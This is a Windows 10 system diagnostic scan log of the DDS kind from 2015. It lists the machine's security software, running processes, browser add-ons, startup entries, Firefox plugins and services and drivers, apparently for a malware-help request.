Internet Explorer: 11.0.10240.16412 BrowserJavaVersion: 11.40.2
Run by philippe at 14:56:42 on 2015-09-23
Microsoft Windows 10 Home 10.0.10240.0.1252.44.1043.18.8072.4770 [GMT 2:00]
.
AV: Norton Internet Security *Enabled/Updated* {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AV: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Norton Internet Security *Enabled/Updated* {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Norton Internet Security *Enabled* {6BFC5632-188D-B806-D13E-C607121B42A0}
.
============== Running Processes ===============
.
C:\WINDOWS\system32\svchost.exe -k DcomLaunch
C:\WINDOWS\system32\svchost.exe -k RPCSS
C:\WINDOWS\system32\svchost.exe -k netsvcs
C:\WINDOWS\System32\svchost.exe -k NetworkService
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\WINDOWS\system32\nvvsvc.exe
C:\Windows\System32\WUDFHost.exe
C:\WINDOWS\system32\igfxCUIService.exe
C:\WINDOWS\system32\dashost.exe
C:\WINDOWS\System32\spoolsv.exe
C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork
C:\WINDOWS\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
C:\Program Files\Intel\iCLS Client\HeciServer.exe
C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
C:\WINDOWS\System32\svchost.exe -k utcsvc
C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
C:\Program Files\Acer\Acer Launch Manager\LMSvc.exe
C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\Bin\IpOverUsbSvc.exe
C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe
C:\Program Files (x86)\Acer\Acer Cloud\CCDMonitorService.exe
C:\Program Files (x86)\McAfee\SiteAdvisor\mcsacore.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
C:\Program Files (x86)\Norton Anti-Theft\Engine\1.10.0.9\NAT.exe
C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\NIS.exe
C:\Program Files\MySQL\MySQL Server 5.6\bin\mysqld.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
C:\WINDOWS\system32\svchost.exe -k appmodel
C:\Program Files (x86)\VMware\VMware Workstation\vmware-authd.exe
C:\Program Files (x86)\Common Files\VMware\USB\vmware-usbarbitrator64.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
svchost.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe
C:\WINDOWS\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\WINDOWS\system32\SearchIndexer.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
c:\Program Files (x86)\Nero\Update\NASvc.exe
C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe
C:\WINDOWS\system32\taskeng.exe
C:\WINDOWS\System32\dwm.exe
C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
C:\WINDOWS\system32\nvvsvc.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files (x86)\Norton Online Backup ARA\Engine\4.3.0.14\Ara.exe
C:\WINDOWS\system32\CompatTelRunner.exe
C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.16464_none_116100d161f6ab1d\TiWorker.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
C:\WINDOWS\system32\sihost.exe
C:\WINDOWS\system32\taskhostw.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\WINDOWS\system32\igfxEM.exe
C:\WINDOWS\system32\igfxHK.exe
C:\WINDOWS\system32\igfxTray.exe
C:\WINDOWS\Explorer.EXE
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\NIS.exe
C:\Program Files (x86)\Norton Anti-Theft\Engine\1.10.0.9\NAT.exe
C:\Windows\System32\RuntimeBroker.exe
C:\PROGRAM FILES\SYNAPTICS\SYNTP\SYNTPHELPER.EXE
C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
C:\Dolby PCEE4\pcee4.exe
C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
C:\Program Files\Acer\Acer Launch Manager\LMEvent.exe
C:\WINDOWS\system32\wbem\unsecapp.exe
C:\Program Files\Acer\Acer Launch Manager\LMTray.exe
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
C:\Program Files\Acer\Acer Power Management\ePowerTray.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe
C:\Users\philippe\AppData\Local\FluxSoftware\Flux\flux.exe
C:\Program Files\SteelSeries\SteelSeries Engine 3\SteelSeriesEngine3.exe
C:\Users\philippe\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\acrotray.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\WINDOWS\SysWOW64\cmd.exe
C:\WINDOWS\SysWOW64\cmd.exe
C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\conathst.exe
C:\Program Files (x86)\McAfee\SiteAdvisor\McChHost.exe
C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.93\nacl64.exe
C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.93\nacl64.exe
C:\WINDOWS\sysWOW64\wbem\wmiprvse.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\WINDOWS\system32\svchost.exe -k UnistackSvcGroup
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\WINDOWS\system32\igfxext.exe
C:\WINDOWS\system32\wbem\unsecapp.exe
C:\Program Files\Acer\Acer Power Management\ePowerEvent.exe
C:\WINDOWS\system32\backgroundTaskHost.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\WINDOWS\system32\taskhostw.exe
C:\Windows\System32\InstallAgent.exe
C:\WINDOWS\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://acer13.msn.com
uDefault_Page_URL = hxxp://acer13.msn.com
BHO: Norton Identity Protection: {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\coieplg.dll
BHO: Norton Vulnerability Protection: {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_40\bin\ssv.dll
BHO: Adobe Acrobat Create PDF Helper: {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll
BHO: Skype Click to Call for Internet Explorer: {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_40\bin\jp2ssv.dll
BHO: Adobe Acrobat Create PDF from Selection: {F4971EE7-DAA0-4053-9964-665D8EE6A077} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll
TB: Adobe Acrobat Create PDF Toolbar: {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\AcroIEFavClient.dll
TB: Norton Toolbar: {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\coieplg.dll
uRun: [MySQL Notifier] C:\Program Files (x86)\MySQL\MySQL Notifier 1.1\MySqlNotifier.exe
uRun: [GoogleChromeAutoLaunch_C808038095EFA9BE95E2C3158E13BB87] "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-startup-window
uRun: [Dropbox Update] "C:\Users\philippe\AppData\Local\Dropbox\Update\DropboxUpdate.exe" /c
uRun: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
uRun: [OneDrive] "C:\Users\philippe\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
uRun: [f.lux] "C:\Users\philippe\AppData\Local\FluxSoftware\Flux\flux.exe" /noshow
uRunOnce: [Uninstall C:\Users\philippe\AppData\Local\Microsoft\OneDrive\17.3.5892.0626\amd64] C:\WINDOWS\System32\cmd.exe /q /c rmdir /s /q "C:\Users\philippe\AppData\Local\Microsoft\OneDrive\17.3.5892.0626\amd64"
uRunOnce: [Uninstall C:\Users\philippe\AppData\Local\Microsoft\OneDrive\17.3.5907.0716\amd64] C:\WINDOWS\System32\cmd.exe /q /c rmdir /s /q "C:\Users\philippe\AppData\Local\Microsoft\OneDrive\17.3.5907.0716\amd64"
uRunOnce: [Uninstall C:\Users\philippe\AppData\Local\Microsoft\OneDrive\17.3.5930.0814\amd64] C:\WINDOWS\System32\cmd.exe /q /c rmdir /s /q "C:\Users\philippe\AppData\Local\Microsoft\OneDrive\17.3.5930.0814\amd64"
mRun: [mcui_exe] "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
mRun: [vmware-tray.exe] "C:\Program Files (x86)\VMware\VMware Workstation\vmware-tray.exe"
mRun: [Adobe Creative Cloud] "C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe" --showwindow=false --onOSstartup=true
mRun: [Acrobat Assistant 8.0] "C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Acrotray.exe"
mRun: [Razer Synapse] "C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe"
mExplorerRun: [BtvStack] "C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe"
StartupFolder: C:\Users\philippe\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\Dropbox.lnk - C:\Users\philippe\AppData\Roaming\Dropbox\bin\Dropbox.exe
StartupFolder: C:\Users\philippe\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\VERZEN~1.LNK - C:\Program Files\Microsoft Office 15\root\office15\ONENOTEM.EXE
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\StartUp\STEELS~1.LNK - C:\Program Files\SteelSeries\SteelSeries Engine 3\SteelSeriesEngine3.exe
mPolicies-System: DSCAutomationHostEnabled = dword:2
IE: E&xport to Microsoft Excel - C:\Program Files\Microsoft Office 15\Root\Office15\EXCEL.EXE/3000
IE: Se&nd to OneNote - C:\Program Files\Microsoft Office 15\Root\Office15\ONBttnIE.dll/105
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office 15\root\office15\ONBttnIE.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office 15\root\office15\ONBttnIELinkedNotes.dll
IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
TCP: NameServer = 195.130.130.132 195.130.131.132
TCP: Interfaces\{9f37bd29-efb0-458c-ae2b-73e77f48bb58} : DHCPNameServer = 195.130.130.132 195.130.131.132
TCP: Interfaces\{9f37bd29-efb0-458c-ae2b-73e77f48bb58}\45D4F57457563747 : DHCPNameServer = 172.30.2.10
TCP: Interfaces\{9f37bd29-efb0-458c-ae2b-73e77f48bb58}\4756C656E65647D25444247343 : DHCPNameServer = 195.130.130.132 195.130.131.132
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\office15\msosb.dll
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
SSODL: WebCheck - <orphaned>
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.93\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
x64-BHO: Skype for Business Browser Helper: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll
x64-BHO: Norton Identity Protection: {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton Internet Security\Engine64\22.5.2.15\coieplg.dll
x64-BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.8.0_40\bin\ssv.dll
x64-BHO: CIESpeechBHO Class: {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} - C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll
x64-BHO: Adobe Acrobat Create PDF Helper: {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll
x64-BHO: Skype Click to Call for Internet Explorer: {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
x64-BHO: Microsoft SkyDrive Pro Browser Helper: {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL
x64-BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre1.8.0_40\bin\jp2ssv.dll
x64-BHO: Adobe Acrobat Create PDF from Selection: {F4971EE7-DAA0-4053-9964-665D8EE6A077} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll
x64-TB: Norton Toolbar: {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine64\22.5.2.15\coieplg.dll
x64-TB: Adobe Acrobat Create PDF Toolbar: {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\x64\AcroIEFavClient.dll
x64-Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
x64-Run: [RtHDVBg_Dolby] "C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe" /FORPCEE4
x64-Run: [IgfxTray] C:\WINDOWS\System32\igfxtray.exe
x64-Run: [AdobeAAMUpdater-1.0] "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
x64-Run: [NvBackend] "C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe"
x64-Run: [ShadowPlay] C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\nvspcap64.dll,ShadowPlayOnSystemStart
x64-Run: [SynTPEnh] C:\Program Files (x86)\Synaptics\SynTP\SynTPEnh.exe
x64-ExplorerRun: [BtvStack] "C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe"
x64-mPolicies-System: DSCAutomationHostEnabled = dword:2
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\ONBttnIE.dll
x64-IE: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\ONBttnIELinkedNotes.dll
x64-IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
x64-Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll
x64-Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - <orphaned>
x64-Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll
x64-Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
x64-Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-SSODL: WebCheck - <orphaned>
x64-mASetup: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - /UserInstall
x64-mASetup: {89820200-ECBD-11cf-8B85-00AA005B4340} - U
x64-CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\philippe\AppData\Roaming\Mozilla\Firefox\Profiles\e3w9td4s.default\
FF - plugin: C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Air\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll
FF - plugin: C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll
FF - plugin: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.27.5\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll
FF - plugin: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_40\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_40\bin\plugin2\npjp2.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.20513.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll
FF - plugin: C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL
FF - plugin: C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_17_0_0_169.dll
.
============= SERVICES / DRIVERS ===============
.
R0 iaStorA;iaStorA;C:\WINDOWS\System32\drivers\iaStorA.sys [2013-2-1 652784]
R0 nvpciflt;nvpciflt;C:\WINDOWS\System32\drivers\nvpciflt.sys [2015-7-13 31560]
R0 SymEFASI;Symantec Extended File Attributes (SI);C:\WINDOWS\System32\drivers\NISx64\1605020.00F\symefasi64.sys [2015-7-21 1620720]
R0 vsock;vSockets Driver;C:\WINDOWS\System32\drivers\vsock.sys [2014-9-26 73296]
R0 WindowsTrustedRT;Windows Trusted Execution Environment Class Extension;C:\WINDOWS\System32\drivers\WindowsTrustedRT.sys [2015-7-10 106520]
R0 WindowsTrustedRTProxy;Microsoft Windows Trusted Runtime Secure Service;C:\WINDOWS\System32\drivers\WindowsTrustedRTProxy.sys [2015-7-10 17944]
R0 Wof;Windows Overlay File System Filter Driver;C:\WINDOWS\System32\drivers\wof.sys [2015-8-20 200528]
R1 ahcache;Application Compatibility Cache;C:\WINDOWS\System32\drivers\ahcache.sys [2015-7-10 215552]
R1 BHDrvx64;BHDrvx64;C:\Program Files (x86)\Norton Internet Security\NortonData\22.5.0.124\Definitions\BASHDefs\20150904.001\BHDrvx64.sys [2015-9-18 1650936]
R1 ccSet_NAT;Norton Anti-Theft Settings Manager;C:\WINDOWS\System32\drivers\NATx64\010A000.009\ccSetx64.sys [2014-9-20 150104]
R1 ccSet_NIS;NIS Settings Manager;C:\WINDOWS\System32\drivers\NISx64\1605020.00F\ccsetx64.sys [2015-7-21 173808]
R1 FileCrypt;FileCrypt;C:\WINDOWS\System32\drivers\filecrypt.sys [2015-7-10 83968]
R1 GpuEnergyDrv;GPU Energy Driver;C:\WINDOWS\System32\drivers\gpuenergydrv.sys [2015-7-10 8192]
R1 IDSVia64;IDSVia64;C:\Program Files (x86)\Norton Internet Security\NortonData\22.5.0.124\Definitions\IPSDefs\20150918.002\IDSviA64.sys [2015-9-19 767224]
R1 SymIRON;Symantec Iron Driver;C:\WINDOWS\System32\drivers\NISx64\1605020.00F\ironx64.sys [2015-7-21 297720]
R1 SymNetS;Symantec Network Security WFP Driver;C:\WINDOWS\System32\drivers\NISx64\1605020.00F\symnets.sys [2015-7-21 576248]
R2 AdobeUpdateService;AdobeUpdateService;C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [2015-7-22 680112]
R2 c2cautoupdatesvc;Skype Click to Call Updater;C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [2015-5-1 1394816]
R2 c2cpnrsvc;Skype Click to Call PNR Service;C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [2015-5-1 1772672]
R2 CCDMonitorService;CCDMonitorService;C:\Program Files (x86)\Acer\Acer Cloud\CCDMonitorService.exe [2013-2-27 2615368]
R2 ClickToRunSvc;Microsoft Office ClickToRun Service;C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe [2014-9-19 2753720]
R2 CoreMessagingRegistrar;CoreMessaging;C:\WINDOWS\System32\svchost.exe -k LocalServiceNoNetwork [2015-7-10 39856]
R2 DiagTrack;Diagnostics Tracking Service;C:\WINDOWS\System32\svchost.exe -k utcsvc [2015-7-10 39856]
R2 rzpmgrk;rzpmgrk;C:\WINDOWS\System32\drivers\rzpmgrk.sys [2015-5-4 37184]
R2 rzpnk;rzpnk;C:\WINDOWS\System32\drivers\rzpnk.sys [2015-5-4 129600]
R2 storqosflt;Storage QoS Filter Driver;C:\WINDOWS\System32\drivers\storqosflt.sys [2015-7-10 61952]
R3 AppXSvc;AppX Deployment Service (AppXSVC);C:\WINDOWS\System32\svchost.exe -k wsappx [2015-7-10 39856]
R3 BtFilter;BtFilter;C:\WINDOWS\System32\drivers\btfilter.sys [2015-3-9 599240]
R3 ccSet_NARA;NARA Settings Manager;C:\WINDOWS\System32\drivers\NARAx64\0403000.00E\ccSetx64.sys [2013-10-14 168608]
R3 ClipSVC;Client License Service (ClipSVC);C:\WINDOWS\System32\svchost.exe -k wsappx [2015-7-10 39856]
R3 EraserUtilRebootDrv;EraserUtilRebootDrv;C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [2015-7-29 153936]
R3 iwdbus;IWD Bus Enumerator;C:\WINDOWS\System32\drivers\iwdbus.sys [2015-3-4 30512]
R3 k57nd60a;Broadcom NetLink (TM) Gigabit Ethernet - NDIS 6.0;C:\WINDOWS\System32\drivers\k57nd60a.sys [2014-7-24 458960]
R3 LMDriver;Launch Manager Wireless Driver;C:\WINDOWS\System32\drivers\LMDriver.sys [2013-1-10 21360]
R3 MBAMProtector;MBAMProtector;C:\WINDOWS\System32\drivers\mbam.sys [2015-9-19 25816]
R3 MBAMSwissArmy;MBAMSwissArmy;C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys [2015-9-19 113880]
R3 MBAMWebAccessControl;MBAMWebAccessControl;C:\WINDOWS\System32\drivers\mwac.sys [2015-9-19 64216]
R3 mfesapsn;McAfee Process Start Notification Service;C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [2015-8-20 37960]
R3 NdisVirtualBus;Microsoft Virtual Network Adapter Enumerator;C:\WINDOWS\System32\drivers\NdisVirtualBus.sys [2015-7-10 20992]
R3 NvStreamKms;NvStreamKms;C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [2015-2-11 19600]
R3 nvvad_WaveExtensible;NVIDIA Virtual Audio Device (Wave Extensible) (WDM);C:\WINDOWS\System32\drivers\nvvad64v.sys [2015-2-11 38032]
R3 RadioShim;Shim for HID-KMDF Interface layer;C:\WINDOWS\System32\drivers\RadioShim.sys [2013-1-10 15704]
R3 SmbDrvI;SmbDrvI;C:\WINDOWS\System32\drivers\Smb_driver_Intel.sys [2015-6-4 42696]
R3 sshid;SteelSeries HID Service;C:\WINDOWS\System32\drivers\sshid.sys [2014-8-13 38912]
S0 SymELAM;Symantec ELAM Driver;C:\WINDOWS\System32\drivers\NISx64\1605020.00F\symelam.sys [2015-7-21 24192]
S3 ADP80XX;ADP80XX;C:\WINDOWS\System32\drivers\adp80xx.sys [2015-7-10 1135456]
S3 AJRouter;AllJoyn Router Service;C:\WINDOWS\System32\svchost.exe -k LocalService [2015-7-10 39856]
S3 AppReadiness;App Readiness;C:\WINDOWS\System32\svchost.exe -k AppReadiness [2015-7-10 39856]
S3 bcmfn2;bcmfn2 Service;C:\WINDOWS\System32\drivers\bcmfn2.sys [2015-7-10 17624]
S3 BthHFSrv;Bluetooth Handsfree Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceAndNoImpersonation [2015-7-10 39856]
S3 BthLEEnum;Bluetooth Low Energy Driver;C:\WINDOWS\System32\drivers\BthLEEnum.sys [2015-7-10 237568]
S3 buttonconverter;Service for Portable Device Control devices;C:\WINDOWS\System32\drivers\buttonconverter.sys [2015-7-10 32256]
S3 c2wts;Claims to Windows Token Service;C:\Program Files\Windows Identity Foundation\v3.5\c2wtshost.exe [2015-7-10 5632]
S3 CapImg;HID driver for CapImg touch screen;C:\WINDOWS\System32\drivers\capimg.sys [2015-7-10 116736]
S3 CDPSvc;CDPSvc;C:\WINDOWS\System32\svchost.exe -k LocalService [2015-7-10 39856]
S3 DcpSvc;DataCollectionPublishingService;C:\WINDOWS\System32\svchost.exe -k netsvcs [2015-7-10 39856]
S3 DeviceFastLaneService;Device Fast-lane Service;C:\Program Files\Acer\Acer Device Fast-lane\DeviceFastLaneSvc.exe [2013-5-1 470056]
S3 DevQueryBroker;DevQuery Background Discovery Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted [2015-7-10 39856]
S3 diagnosticshub.standardcollector.service;Microsoft (R) Diagnostics Hub Standard Collector Service;C:\WINDOWS\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe [2015-7-10 27136]
S3 fcvsc;fcvsc;C:\WINDOWS\System32\drivers\fcvsc.sys [2015-7-10 31232]
S3 genericusbfn;Generic USB Function Class;C:\WINDOWS\System32\drivers\genericusbfn.sys [2015-7-10 20992]
S3 hidinterrupt;Common Driver for HID Buttons implemented with interrupts;C:\WINDOWS\System32\drivers\hidinterrupt.sys [2015-7-10 50016]
S3 iaLPSSi_GPIO;Intel(R) Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys [2015-7-10 38128]
